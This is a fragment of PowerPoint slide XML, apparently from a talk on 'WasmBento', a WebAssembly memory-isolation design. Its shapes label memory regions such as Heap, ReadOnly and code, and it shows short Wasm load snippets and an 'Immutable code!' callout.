                <a:gd name="connsiteX1" fmla="*/ 6900512 w 6900512"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1843578"/>
                <a:gd name="connsiteX2" fmla="*/ 6900512 w 6900512"/>
                <a:gd name="connsiteY2" fmla="*/ 1843578 h 1843578"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY3" fmla="*/ 1843578 h 1843578"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 184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0512" h="1843578">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6900512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6900512" y="1843578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18435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t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr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5100" dirty="0" err="1"/>
                <a:t>Reasonable</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="5100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="5100" dirty="0" err="1"/>
                <a:t>performance</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="5100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="5100" dirty="0" err="1"/>
                <a:t>overhead</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr lvl="0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8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0F8ED-8D98-823A-F671-0F079BC2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D4C14B93-ED02-6204-23A8-5AFB2B0AC28C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596734" y="2493086"/>
            <a:ext cx="3211601" cy="3869859"/>
            <a:chOff x="596735" y="2493086"/>
            <a:chExt cx="2083246" cy="3869859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6671E2AD-AE8E-AE9C-A3AB-B152E3FBAA6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="596735" y="2493087"/>
              <a:ext cx="2083246" cy="3869858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78" name="Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B4D573-CB7C-70B5-BCD7-4E651044E2F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="774748" y="2493086"/>
              <a:ext cx="172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Memory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09A5E1-E87F-7DB8-775B-A830AC23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499594-FE78-706C-8D8C-1129A6C5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24C2E1-771F-FAD4-4FBE-FE6D60DD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25</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE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21C6DFC-8E75-2D94-F0D4-2A7666081C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5695104" y="2294559"/>
            <a:ext cx="5149983" cy="3866097"/>
            <a:chOff x="6466551" y="2294559"/>
            <a:chExt cx="5339248" cy="3866097"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rechteck: abgerundete Ecken 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF538AA-BE33-CBFE-3C7D-F60E35E8C252}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6466551" y="2349586"/>
              <a:ext cx="5339248" cy="381107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Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078DB730-9A15-D92A-7631-0C26D33D4912}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579626" y="2294559"/>
              <a:ext cx="172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13A246B-7431-56E6-9E1F-3F54415CEA88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4623024" y="166635"/>
            <a:ext cx="3184338" cy="1721471"/>
            <a:chOff x="350274" y="4523310"/>
            <a:chExt cx="3184338" cy="1721471"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Grafik 15" descr="Bento-Box mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4EE7F7-728C-0F20-4BBA-DAB88E3D8D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0274" y="4523310"/>
              <a:ext cx="1299941" cy="1299941"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E3887ADE-1D32-6A58-CFF0-74167F257B80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1000245" y="5598450"/>
              <a:ext cx="2534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err="1"/>
                <a:t>WasmBento</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="3600" dirty="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215780A-E1EE-9A6A-9D0F-BF1B7650A03E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5912732" y="2770423"/>
            <a:ext cx="2534367" cy="2050289"/>
            <a:chOff x="7334522" y="2673997"/>
            <a:chExt cx="2083246" cy="1445421"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E44AC70-0ACF-3E36-97C5-5093E28FD80B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7334522" y="2673997"/>
              <a:ext cx="2083246" cy="1445421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Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D9C0CD1-BF69-3A21-E99A-6E1F7907570C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8203660" y="2708458"/>
              <a:ext cx="286274" cy="3039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Heap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D7516CB-A849-C58C-7563-96AB4E5B77DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8512142" y="2625491"/>
            <a:ext cx="2083246" cy="1889838"/>
            <a:chOff x="9586496" y="2673997"/>
            <a:chExt cx="2083246" cy="2527854"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8A73848-CC83-C7ED-6029-32D759C32A2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9586496" y="2673997"/>
              <a:ext cx="2083246" cy="2527854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6" name="Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02871096-1A25-D58D-E82D-A4082D214B10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9906396" y="2708458"/>
              <a:ext cx="1384739" cy="617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ReadOnly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B2855DA-4016-C155-CB64-AC9B60603BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8493636" y="4617963"/>
            <a:ext cx="2083246" cy="1466272"/>
            <a:chOff x="9586496" y="2673997"/>
            <a:chExt cx="2083246" cy="2527854"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86BEB816-A779-7FD6-D09D-FDD5EA98898A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9586496" y="2673997"/>
              <a:ext cx="2083246" cy="252785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6" name="Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2185C908-301A-9650-CAF1-5405CB978BE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10133063" y="2708458"/>
              <a:ext cx="931409" cy="795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DataB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70ACF1D-47FB-B4E4-7FEC-5A9464E0FC34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7389364" y="4873050"/>
            <a:ext cx="1062258" cy="1218927"/>
            <a:chOff x="7334522" y="2673997"/>
            <a:chExt cx="2083246" cy="1445421"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5A8B2D-9B22-B207-52E7-35526504419A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7334522" y="2673997"/>
              <a:ext cx="2083246" cy="1445421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Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C6F411-DD3F-FFE2-A037-B922E8B31744}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7919554" y="2708458"/>
              <a:ext cx="854478" cy="474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FuncY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6E7A8C4-83EE-0839-195B-754DC4161168}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6232062" y="4873050"/>
            <a:ext cx="1062258" cy="1191097"/>
            <a:chOff x="7334522" y="2673997"/>
            <a:chExt cx="2083246" cy="1445421"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D741BEED-0039-CFF3-E7FC-FA03A35210DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7334522" y="2673997"/>
              <a:ext cx="2083246" cy="1445421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4" name="Textfeld 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6D46975-5E3D-B237-48B4-DD72811390C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7693580" y="2708459"/>
              <a:ext cx="1306429" cy="485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</a:rPr>
                <a:t>FuncX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Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0D27C3A-9D3D-47CC-7B6F-185FDE442DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2204954" y="4474610"/>
            <a:ext cx="712020" cy="57380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FF90945-0319-CEE6-5EC6-249C375CB0BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="350235" y="395016"/>
            <a:ext cx="3391602" cy="1380726"/>
            <a:chOff x="752590" y="4375040"/>
            <a:chExt cx="3391602" cy="1380726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2035F2A5-2439-FCB7-9847-2B1279FA2807}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="897313" y="4806415"/>
              <a:ext cx="3246879" cy="949351"/>
              <a:chOff x="4567314" y="968032"/>
              <a:chExt cx="3246879" cy="949351"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Rechteck: abgerundete Ecken 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A57D44B-EE0E-7CA8-35D1-21052760C888}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4567314" y="968032"/>
                <a:ext cx="3246879" cy="949351"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg2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425"/>
                  </a:lnSpc>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="de-DE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endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:lnSpc>
                    <a:spcPts val="1425"/>
                  </a:lnSpc>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="de-DE" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4EC9B0"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:lnSpc>
                    <a:spcPts val="1425"/>
                  </a:lnSpc>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE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i32</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="D4D4D4"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>.load</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE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de-DE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$</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" b="0" dirty="0" err="1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image</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE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16F5104-491F-897C-2CA5-6DC307222356}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5777820" y="992826"/>
                <a:ext cx="8258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Code</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="79" name="Grafik 56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DAD7D0A4-DA41-B7C5-1B44-53F64EF25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52590" y="4375040"/>
              <a:ext cx="770900" cy="6195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E859340-0152-F532-7649-4FA554DBB314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8058404" y="857639"/>
            <a:ext cx="3654967" cy="1348743"/>
            <a:chOff x="8472997" y="1051758"/>
            <a:chExt cx="3654967" cy="1348743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E21577A-8C7F-6BAC-784E-146DF33021A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8876574" y="1451150"/>
              <a:ext cx="3251390" cy="949351"/>
              <a:chOff x="4620468" y="968031"/>
              <a:chExt cx="3251390" cy="2548904"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Rechteck: abgerundete Ecken 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A525BB8-0FF0-A3C3-FAA9-906C28BD2E7A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4620468" y="968031"/>
                <a:ext cx="3251390" cy="2548904"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg2"/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ts val="1425"/>
                  </a:lnSpc>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="de-DE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endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:lnSpc>
                    <a:spcPts val="1425"/>
                  </a:lnSpc>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="de-DE" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4EC9B0"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:lnSpc>
                    <a:spcPts val="1425"/>
                  </a:lnSpc>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="de-DE" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4EC9B0"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:lnSpc>
                    <a:spcPts val="1425"/>
                  </a:lnSpc>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4EC9B0"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>i32</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="D4D4D4"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>.load</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE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de-DE" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="F44747"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>@Heap</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="CCCCCC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de-DE" b="0" dirty="0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$</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" b="0" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="9CDCFE"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>image</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="CCCCCC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4CA17183-8E5A-D8E2-06D6-2BF50A099291}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5428215" y="1122130"/>
                <a:ext cx="1635897" cy="1239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Bento Code</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Grafik 56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48301894-2029-97AE-9416-A648ABD0C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472997" y="1051758"/>
              <a:ext cx="770900" cy="61951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BC03171-5CD6-2CAD-C3C6-A965BBED2F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4248727" y="443345"/>
            <a:ext cx="0" cy="5791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prechblase: rechteckig 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C85A74-DFD2-B631-0171-0E3923B2B9D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9412330" y="249382"/>
            <a:ext cx="2464053" cy="852193"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22769"/>
              <a:gd name="adj2" fmla="val 8062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Immutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t> code!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Verbinder: gekrümmt 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9475E946-BE63-EEA0-F84D-5BDBF0A8D42C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="79" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1121135" y="704774"/>
            <a:ext cx="3501889" cy="11183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06BCAF56-0392-B384-9497-1338454AC1AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6871410" y="2377381"/>
            <a:ext cx="2042120" cy="2973043"/>
            <a:chOff x="7832118" y="2377381"/>
            <a:chExt cx="2042120" cy="2973043"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="145746"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="68" name="Grafik 67" descr="Schild Häkchen mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B4584F-BFF7-B9A8-0783-483B9AB9404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50629" y="2377381"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70" name="Grafik 69" descr="Schild Häkchen mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4035C138-38CF-8EC0-B7A0-71D11AC04B9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32118" y="4436024"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="71" name="Grafik 70" descr="Schild Häkchen mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC57A07E-241B-99FD-2F8D-E7A66CB61A6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59838" y="4223314"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EC1470-6DEA-2B5C-6724-2ED747D92810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1492281" y="2962050"/>
            <a:ext cx="1420506" cy="990418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tag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6151154-557B-0057-8C87-074668780FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490429" y="3934477"/>
            <a:ext cx="1424210" cy="57380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err="1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otherData</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 2" descr="https://cdn1.iconfinder.com/data/icons/large-glossy-icons/512/Spy.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
